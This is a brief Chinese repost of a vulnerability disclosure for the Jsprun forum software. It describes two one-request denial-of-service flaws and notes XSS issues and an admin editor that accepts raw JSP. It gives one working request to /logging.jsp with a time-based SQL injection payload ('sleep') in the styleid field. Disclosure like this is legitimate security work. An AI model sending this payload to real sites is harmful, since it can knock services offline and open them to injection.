Jsprun使用struts开发,分析几天代码 发现两处 函数型DOS 先发给官方吧.因為还挺严重的 只要送一个请求,网站就死了
官方修复了之前的注入 漏洞 ,但同时还存在着许多问题 例如 xss 就有很多 建议所有的输入都要过滤 后台的编辑模块 可以直接写 jsp 代码 这是不靠谱的,建议改改
1. /logging.jsp?action=login answer=1&cookietime=86400&loginfield=username&loginmode=normal&password=acUn3t1x&questionid=0&referer=index.jsp&styleid=1' and sleep(1)='&username=t
2.发文的subject
查看更多关于Jsprun论坛函数型DOS漏洞2处 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13598